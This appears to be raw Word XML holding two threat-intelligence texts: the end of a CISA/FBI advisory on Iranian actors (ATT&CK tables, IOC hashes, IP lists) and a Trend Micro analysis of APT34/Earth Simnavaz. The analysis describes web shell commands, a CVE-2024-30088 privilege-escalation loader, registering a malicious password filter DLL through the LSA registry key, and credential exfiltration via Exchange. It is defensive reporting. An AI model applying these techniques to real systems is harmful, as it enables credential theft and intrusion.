        <w:t>Meeting the minimum password strength [CPG 2.B] by creating a password using 8-64 nonstandard characters and long passphrases, when possible. Disable the use of RC4 for Kerberos authentication.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These mitigations apply to critical infrastructure entities across sectors.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authoring agencies also recommend software manufacturers incorporate secure by design principles and tactics into their software development practices to protect their customers against actors using compromised credentials, thereby strengthening the security posture of their customers. For more information on secure by design, see CISA's Secure by Design webpage and joint guide. Validate Security Controls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addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating organization security programs against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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To get started: Select an ATT&amp;CK technique described in this advisory (see Table 1 to Table 12). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. Contact Information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Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to: CISA via CISA's 24/7 Operations Center [report@cisa.gov or 1-844-Say-CISA (1-844-729-2472)] or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov. Disclaimer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information in this report is being provided "as is" for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.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Intrusion events connected to this Iranian group may also include a different set of cyber actors-likely the third-party actors who purchased access from the Iranian group via cybercriminal forums or other channels. As a result, some TTPs and IOCs noted in this advisory may be tied to these third-party actors, not the Iranian actors. The TTPs and IOCs are in the advisory to provide recipients the most complete picture of malicious activity that may be observed on compromised networks. However, exercise caution if formulating attribution assessments based solely on matching TTPs and IOCs. Version History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October 16, 2024: Initial version. Appendix A: MITRE ATT&amp;CK Tactics and Techniques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See Tables 1-12 for all referenced actors' tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool. Table 1: Reconnaissance Technique Title ID Use Gather Victim Identity Information T1589 The actors likely gathered victim information. Table 2: Resource Development Technique Title ID Use Obtain Capabilities: Tool T1588.002 The actors obtained a password spray tool through an open-source repository.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3: Initial Access Technique Title ID Use Valid Accounts T1078 The actors used password spraying to obtain valid user and group email account credentials, allowing them access to the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Valid Accounts: Cloud Accounts T1078.004 The actors used accounts hosted on Microsoft 365, Azure, and Okta cloud environments as additional methods for initial access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>External Remote Services T1133 The actors exploited Citrix systems' external-facing remote services as another method for gaining initial access to the system.</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4: Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 The actors used PowerShell commands to maintain and expand access.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5: Persistence Technique Title ID Use Account Manipulation: Device Registration T1098.005 The actors used PowerShell commands to maintain and expand access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Modify Authentication Process T1556 The actors used a public facing Active Directory Federation Service (ADFS) domain to reset the passwords of expired accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Modify Authentication Process: Multi-Factor Authentication T1556.006 The actors used an MFA bypass method, such as Multi-Factor Authentication Request Generation, providing the ability to modify or completely disable MFA defenses.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6: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 The actors attempted impersonation of the domain controller likely by exploiting CVE-2020-1472, Microsoft's Netlogon Privilege Escalation vulnerability.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain or Tenant Policy Modification: Trust Modification T1484.002 The actors leveraged a public-facing ADFS password reset tool to reactivate inactive accounts, allowing the actor to authenticate and enroll their devices as any user in the AD managed by the victim tenant.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7: Defense Evasion Technique Title ID Use Indirect Command Execution T1202 The actors attempted impersonation of the Domain Controller likely by exploiting CVE-2020-1472, Microsoft's Netlogon Privilege Escalation vulnerability.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8: Credential Access Technique Title ID Use Brute Force: Password Spraying T1110.003 The actors targeted applications, including Single Sign-on (SSO) Microsoft Office 365, using brute force password sprays and imported the tool DomainPasswordSpray.ps1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Credentials from Password Stores T1555 The actors used the command Cmdkey /list likely to display usernames and credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Steal or Forge Kerberos Tickets: Kerberoasting T1558.003 The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Rivest Cipher 4 (RC4) tickets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Multi-Factor Authentication Request Generation T1621 The actors sent MFA requests to legitimate users.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9: Discovery Technique Title ID Use Remote System Discovery T1018 The actors used LOTL to return information about domain controllers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Permission Groups Discovery: Domain Groups T1069.002 The actors used LOTL to return lists of domain administrators and enterprise administrators. Permission Groups Discovery: Cloud Groups T1069.003 The actors used LOTL to return lists of domain administrators and enterprise administrators. System Information Discovery T1082 The actors were able to query the AD to discover display names, operating systems, descriptions, and distinguished names from the computer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account Discovery: Domain Account T1087.002 The actors used LOTL to return lists of domain administrators and enterprise administrators.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain Trust Discovery T1482 The actors used LOTL to return information about trusted domains.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10: Lateral Movement Technique Title ID Use Remote Services: Remote Desktop Protocol T1021.001 The actors used Microsoft Word to open PowerShell to launch RDP binary mstsc.exe.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11: Collection Technique Title ID Use Data from Local System T1005 The actors downloaded files related to remote access methods and the organization's inventory.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12: Command and Control Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 The actors used msedge.exe to make outbound connections likely to Cobalt Strike Beacon C2 infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ingress Tool Transfer T1105 The actors imported a tool from GitHub and used it to conduct password spraying.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Protocol Tunneling T1572 The actors frequently conduct targeting using a virtual private network (VPN). Appendix B: Indicators of Compromise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See Tables 13 to 15 for IOCs obtained from FBI investigations.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13: Malicious Files Associated with Iranian Cyber Actors Hash Description 1F96D15B26416B2C7043EE7172357AF3AFBB002A Associated with malicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>3D3CDF7CFC881678FEBCAFB26AE423FE5AA4EFEC Associated with malicious activity.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Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains. Many of the IP addresses provided below are assessed VPN nodes and as such are not exclusive to the Iranian actors' use. The authoring organizations do not recommend blocking these IP addresses based solely on their inclusion in this JCSA. The authoring organizations recommend using the below IP addresses to search for previous activity the actors may have conducted against networks. If positive hits for these IP addresses are identified, the authoring organizations recommend making an independent determination if the observed activity aligns with the TTPs outlined in the JCSA. The timeframes included in the table reflect the timeframe the actors likely used the IPs.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14: Network Indicators IP Address Date Range 95.181.234.12 01/30/2024 to 02/07/2024 95.181.234.25 01/30/2024 to 02/07/2024 173.239.232.20 10/06/2023 to 12/19/2023 172.98.71.191 10/15/2023 to 11/27/2023 102.129.235.127 10/21/2023 to 10/22/2023 188.126.94.60 10/22/2023 to 01/12/2024 149.40.50.45 10/26/2023 181.214.166.59 10/26/2023 212.102.39.212 10/26/2023 149.57.16.134 10/26/2023 to 10/27/2023 149.57.16.137 10/26/2023 to 10/27/2023 102.129.235.186 10/29/2023 to 11/08/2023 46.246.8.138 10/31/2023 to 01/26/2024 149.57.16.160 11/08/2023 149.57.16.37 11/08/2023 46.246.8.137 11/17/2023 to 01/25/2024 212.102.57.29 11/19/2023 to 01/17/2024 46.246.8.82 11/22/2023 to 01/28/2024 95.181.234.15 11/26/2023 to 02/07/2024 45.88.97.225 11/27/2023 to 02/11/2024 84.239.45.17 12/04/2023 to 12/07/2023 46.246.8.104 12/07/2023 to 02/07/2024 37.46.113.206 12/07/2023 46.246.3.186 12/07/2023 to 12/09/2023 46.246.8.141 12/07/2023 to 02/10/2024 46.246.8.17 12/09/2023 to 01/09/2024 37.19.197.182 12/15/2023 154.16.192.38 12/25/2023 to 01/24/2024 102.165.16.127 12/27/2023 to 01/28/2024 46.246.8.47 12/29/2023 to 01/29/2024 46.246.3.225 12/30/2023 to 02/06/2024 46.246.3.226 12/31/2023 to 02/03/2024 46.246.3.240 12/31/2023 to 02/06/2024 191.101.217.10 01/05/2024 102.129.153.182 01/08/2024 46.246.3.196 01/08/2024 102.129.152.60 01/09/2024 156.146.60.74 01/10/2024 191.96.227.113 01/10/2024 191.96.227.122 01/10/2024 181.214.166.132 01/11/2024 188.126.94.57 01/11/2024 to 01/13/2024 154.6.13.144 01/13/2024 to 01/24/2024 154.6.13.151 01/13/2024 to 01/28/2024 188.126.94.166 01/15/2024 89.149.38.204 01/18/2024 46.246.8.67 01/20/2024 46.246.8.53 01/22/2024 154.16.192.37 01/24/2024 191.96.150.14 01/24/2024 191.96.150.96 01/24/2024 46.246.8.10 01/24/2024 84.239.25.13 01/24/2024 154.6.13.139 01/26/2024 191.96.106.33 01/26/2024 191.96.227.159 01/26/2024 149.57.16.150 01/27/2024 191.96.150.21 01/27/2024 46.246.8.84 01/27/2024 95.181.235.8 01/27/2024 191.96.227.102 01/27/2024 to 01/28/2024 46.246.122.185 01/28/2024 146.70.102.3 01/29/2024 to 01/30/2024 46.246.3.233 01/30/2024 to 02/15/2024 46.246.3.239 01/30/2024 to 02/15/2024 188.126.89.35 02/03/2024 46.246.3.223 02/03/2024 46.246.3.245 02/05/2024 to 02/06/2024 191.96.150.50 02/09/2024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15: Devices Device Type Description Samsung Galaxy A71 (SM-A715F) Registered with MFA Samsung SM-G998B Registered with MFA Samsung SM-M205F Registered with MFA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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.10.16 17:51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-290a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against UAE and Gulf Regions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 Micro's investigation into the recent activity of Earth Simnavaz provides new insights into the APT group's evolving tactics and the immediate threat it poses to critical sectors in the UAE.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Mohamed Fahmy, Bahaa Yamany, Ahmed Kamal, Nick Dai October 11, 2024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Subscribe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Summary Trend Micro researchers have been monitoring a cyber espionage group known as Earth Simnavaz, also referred to as APT34 and OilRig, which has been actively targeting governmental entities in the UAE and the broader Gulf region.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The group utilizes sophisticated tactics that include deploying a backdoor that leverages Microsoft Exchange servers for credentials theft, and exploiting vulnerabilities like CVE-2024-30088 for privilege escalation. Earth Simnavaz uses a combination of customized .NET tools, PowerShell scripts, and IIS-based malware to allow their malicious activity to blend in with normal network traffic and avoid traditional detection methods. Their recent activity suggests that Earth Simnavaz is focused on abusing vulnerabilities in key infrastructure of geopolitically sensitive regions. They also seek to establish a persistent foothold in compromised entities, so these can be weaponized to launch attacks on additional targets.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Recently, Trend Micro has been tracking Earth Simnavaz (also known as APT34 and OilRig), a cyber espionage group believed to be linked to Iranian interests. This group primarily targets organizations in the energy sector, particularly those involved in oil and gas, as well as other critical infrastructure. It is known for using sophisticated tactics, techniques, and procedures (TTPs) to gain unauthorized access to networks and exfiltrate sensitive information.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recent months, there has been a notable rise in cyberattacks attributed to this APT group specifically targeting government sectors in the United Arab Emirates (UAE) and the broader Gulf region. This escalation in activity underscores the group's ongoing commitment to exploiting vulnerabilities within critical infrastructure and governmental frameworks in these geopolitically sensitive areas.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Our latest research has identified Earth Simnavaz's deployment of a sophisticated new backdoor, which bears striking similarities to malware related to this APT group, as documented in our previous research. This new backdoor facilitates the exfiltration of sensitive credentials, including accounts and passwords, through on-premises Microsoft Exchange servers. Such tactics not only reflect the group's evolving methodologies but also highlight the persistent threat posed to organizations reliant on these platforms.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Moreover, Earth Simnavaz has been observed using the same technique of abusing the dropped password filter policy as detailed in our earlier findings. This technique enables attackers to extract clean-text passwords, further compromising the integrity of targeted systems.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addition to these methods, the group has leveraged a remote monitoring and management (RMM) tool known as ngrok in their operations. This tool allows for the seamless tunneling of traffic, providing attackers with an effective means to maintain persistence and control over compromised environments.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threat actors have also recently added CVE-2024-30088 to their toolset, exploiting this vulnerability for privilege escalation in targeted systems. Integrating this into their toolkit highlights Earth Simnavaz's continuous adaptation by exploiting newer vulnerabilities to make their attacks stealthier and more effective.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Earth Simnavaz's activities highlight the ongoing threat posed by state- sponsored cyber actors, particularly in sectors vital to national security and economic stability. As the threat landscape continues to evolve, understanding the tactics these groups use is crucial for developing effective defense strategies against such sophisticated adversaries. Attack chain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initial point of entry for these attacks has been traced back to a web shell uploaded to a vulnerable web server (Figure 1). This web shell not only allows the execution of PowerShell code but also enables attackers to download and upload files from and to the server, thereby expanding their foothold within the targeted networks.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Once inside the network, the APT group leveraged this access to download the ngrok remote management tool, facilitating lateral movement and enabling them to reach the Domain Controller. During their operations, the group exploited CVE-2024-30088 - the Windows Kernel Elevation of Privilege vulnerability - as a means of privilege escalation, utilizing an exploit binary that was loaded into memory via the open-source tool RunPE-In-Memory.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allowed them to register a password filter DLL, which subsequently dropped a backdoor responsible for exfiltrating sensitive data through the Exchange server. The exfiltrated data was relayed to a mail address controlled by the threat actor, effectively completing the infection chain and ensuring the attackers maintained control over the compromised environment.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 Attack chain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Earth Simnavaz has been known to leverage compromised organizations to conduct supply chain attacks on other government entities. We expected that the threat actor could use the stolen accounts to initiate new attacks through phishing against additional targets.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is also a documented overlap between Earth Simnavaz and another APT group, FOX Kitten. In August, an alert from the Cybersecurity and Infrastructure Security Agency (CISA) highlighted FOX Kitten's role in enabling ransomware attacks targeting organizations in the US and the Middle East. These threats should be taken seriously, as the potential impact on compromised entities could be significant. Observed toolset and techniques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 initial infection was detected when a web shell was uploaded to a vulnerable web server. This web shell extracts values from HTTP request headers ("func" and "command"), as shown in Figure 2. By passing both arguments to other functions, the web shell allows the threat actor to perform various actions (Table 1):</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Command Function Execute PowerShell Command on infected server func=Exe &amp; Command= PW command to be executed Download specific file from infected server func=Exe &amp; Command= FilePath Upload File into infected server func=Exe &amp; Command = content of file to be written on infected server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 Capabilities provided by the web shell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2. Values extracted from HTTP request headers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web shell also decrypts arguments received from the threat actor. It takes a Base64-encoded, AES-encrypted string, decrypts it using a specified key and initialization vector (IV), and returns the decrypted plaintext (Figure 3).</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3. Decrypted string</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response sent back to the threat actor is encrypted using a different function. This response is encrypted with AES using the given key IV. The resulting encrypted string is Base64-encoded (Figure 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4. Response sent back to the threat actor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Exploiting CVE-2024-30088 for persistence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the web shells were implanted on the victim machines, another file called "r.exe" was dropped and executed. This is a simple loader that takes the first argument as the input file, decodes it in one-byte-XOR operation, and executes it. The codes in this loader were reused from an open-source tool (Figure 5). The payload file was encoded to bypass traditional detection methods.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5. Decoding routine in r.exe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payload file called "p.enc" comes with the loader under the same folder. The decoded payload turns out to be a privilege escalation tool. As its PDB string represents, this tool exploits CVE-2024-30088:</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C:\Users\reymond\Desktop\CVE-2024-30088-main\x64\Release\poc.pdb</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vulnerability, which was patched in June, allows threat actors to run arbitrary code in the context of SYSTEM and it works on multiple versions of Windows 10 and 11.</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Our analysis showed that the codes were reused from an open-source project (Figure 6). By using RunPE-In-Memory, combined with CVE-2024-30088, the threat actor was able to carry out their malicious actions stealthily.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6. Reused code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privilege escalation tool is coded to execute another dropped executable named "t.exe", a .NET-compiled installer that creates persistence by using the predefined task definition "e.xml". The installed schedule task is for executing the script "u.ps1". The final "u.ps1" we collected seemed to be replaced with a useless script, leading us to suspect that the threat actors intentionally altered the script and disrupted the incident investigation.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7. Creating persistence using "e.xml"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Abusing the dropped password filter policy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 mentioned earlier, the threat actor has been observed utilizing a tool similar to one identified in our previous research on the same entity. This tool exploits on-premises Exchange servers to exfiltrate credentials to email accounts under their control.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Additionally, abusing the dropped password filter policy has been detected as a method for acquiring credentials, which are then exfiltrated via email. Threat actors can manipulate password filters to intercept or retrieve credentials from domain users via domain controllers or local accounts on local machines. This exploitation occurs because the password validation process necessitates the plaintext password from the Local Security Authority (LSA).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Consequently, deploying and registering a malicious password filter can facilitate credential harvesting each time a user updates their password. This technique necessitates elevated privileges (local administrator access) and can be executed through the following steps: Password Filter psgfilter.dll be dropped into C:\Windows\System32 Registry key modification to register the Password Filter [DLL HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Notification Packages = scecli, psgfilter]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using this technique, the threat actor can capture and harvest every password from compromised machines, even after they have been modified. The malicious DLL includes three exported functions (Figure 9) that facilitate the primary functionality of registering the DLL with the LSA (Figure 8): InitializeChangeNotify: Indicates that a password filter DLL is initialized. PasswordChangeNotify: Indicates that a password has been changed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PasswordFilter: Validates a new password based on password policy.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8. Registering the DLL with the LSA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9. Functions exported by DLL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The malicious actor took great care in working with the plaintext passwords while implementing the password filter export functions. Similar to the incident in our previous research, the threat actor also utilized plaintext passwords to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gain access and deploy tools remotely. The plaintext passwords were first encrypted before being exfiltrated when sent over networks. Exfiltrating data through legitimate mail traffic</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primary function of the exfiltration tool (identified by Trend Micro as STEALHOOK) involves retrieving valid domain credentials from a specific location, which it then uses to access the Exchange Server for data exfiltration. The key objective of this stage is to capture the stolen passwords and transmit them to the attackers as email attachments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Additionally, we observed that the threat actors leverage legitimate accounts with stolen passwords to route these emails through government Exchange Servers.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backdoor exhibits significant similarities to one previously attributed to the same group in our earlier research. The main functionalities of the backdoor can be categorized as follows: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Retrieving User Credentials (Figure 10) - Calls the GetUserPassFromData function to retrieve the username and password needed for authentication from this file: C:\ProgramData\WindowsUpdateService\UpdateDir\edf</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10. The backdoor retrieving user credentials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Retrieving Email Sending Data (Figure 11) - Calls the GetSendData function to retrieve necessary configuration data for sending an email from this file: C:\ProgramData\WindowsUpdateService\UpdateDir\edf Server: The specific Exchange mail server for the targeted government entity where the data is leaked through.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Target: The email addresses through which the malicious actors receive the exfiltrated data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain: The internal active directory (AD) domain name related to the targeted entity.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11. The backdoor retrieving email sending data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Sending Email (Figure 12) - If the configuration data retrieval is successful, the program constructs a message containing the user credentials and the configuration data. The email is sent with a specified subject and body, and all files in the following directory are attached: C:\ProgramData\WindowsUpdateService\UpdateDir Email Subject: "Update Service" Body: "Update Service Is Running..."</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12. The backdoor sending emails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Using RMM tools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threat actor recently upgraded their toolkit by incorporating RMM tools such as ngrok in their latest attacks. Ngrok is a legitimate tool used to create secure tunnels from a local machine to the internet, allowing access to internal services through public URLs. However, cyber attackers can exploit ngrok to bypass firewalls and network security controls for malicious purposes. They may use it to establish command-and-control (C&amp;C) communication, exfiltrate sensitive data, or deploy payloads by creating undetected tunnels between compromised machines and their servers, making it harder for security teams to detect suspicious activity.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ngrok tool was downloaded onto the server using a PowerShell script (Figure 13), after which a WMI command was utilized to authenticate to a remote server, copy the file, and execute it remotely.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13. Downloading ngrok</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appears that the threat actor utilized this tool in the later stages of the attack, leveraging a valid account and password for authentication. These credentials were likely obtained during earlier phases of the operation, in which accounts and passwords were stolen and exfiltrated. Attribution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Multiple data points and indicators attribute this attack to Earth Simnavaz, with evidence showing that the group remains active, specifically targeting Middle Eastern countries and government entities. This campaign, like that in our previously reported research, involved the targeting of Exchange servers and relaying communications through them. A significant similarity has been observed at both the code and functionality levels between the Exchange backdoor used in this attack and the one seen in the earlier campaign.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Additionally, both tools share characteristics with the Karkoff backdoor, which is also linked to the same threat actors and exploits the Exchange Web Services (EWS) API for malicious activities. Earth Simnavaz's tactics also overlap with that of FOX Kitten, another threat group which likewise has been observed using the RMM tool ngrok. Conclusion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Iranian APT groups like Earth Simnavaz have become increasingly active, particularly in targeting the government sector in the Middle East, with a strong focus on the Gulf region. Based on the group's toolset and activities, it's evident that they aim to establish a persistent presence within compromised entities, using the affected infrastructure to launch further attacks on additional targets. Their primary goals appear to be espionage and the theft of sensitive governmental information.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Earth Simnavaz continues to rely on IIS-based malware such as web shells, customized .NET tools, and PowerShell scripts as core components of their attack arsenal. Recent campaigns have confirmed this technique remains actively in use.Geopolitical tensions likely play a significant role in this surge, and government sectors in the Middle East and Gulf region should take these threats seriously. Earth Simnavaz's approach involves blending into normal network activity and customizing its malware to avoid detection.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Intelligence-driven incident response will be essential in effectively managing and mitigating these types of attacks. While the group's techniques haven't evolved drastically, implementing a Zero Trust architecture, alongside mature SOC, EDR, and MDR capabilities, can greatly enhance defensive measures against threats like that posed by Earth Simnavaz.</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Indicators of Compromise (IOCs)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SHA-256 Detection Description db79c39bc06e55a52741a9170d8007fa93ac712df506632d624a651345d33f91 TrojanSpy.MSIL.STEALHOOK.A Update.dll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
